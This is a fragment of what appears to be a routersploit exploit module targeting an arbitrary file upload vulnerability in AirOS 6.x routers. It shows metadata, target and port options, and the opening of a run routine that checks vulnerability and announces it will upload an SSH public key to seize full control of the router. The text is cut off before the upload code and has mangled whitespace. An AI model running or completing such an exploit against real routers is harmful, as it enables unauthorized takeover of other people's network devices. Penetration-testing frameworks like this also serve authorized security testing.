Exploit implementation for AirOS 6.x - Arbitrary File Upload.
If the target is vulnerable is possible to take full control of the router
'''
__info__={
'name':'AirOS 6.x - Arbitrary File Upload',
'description':'Exploit implementation for AirOS 6.x - Arbitrary File Upload. If the target is vulnerable is possible to take full control of the router',
'authors':[
'93c08539',#Vulnerability discovery
'Vinicius Henrique Marangoni'#routersploit module
],
'references':[
'https://hackerone.com/reports/73480',
'https://www.exploit-db.com/exploits/39701/'
],
'targets':[
'AirOS 6.x'
]
}
target=exploits.Option('','Target address e.g. https://192.168.1.1')#Target address
port=exploits.Option(80,'Target port')#Default port
#Disable certificate verification warnings
requests.packages.urllib3.disable_warnings()
defrun(self):
if(self.check()):
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')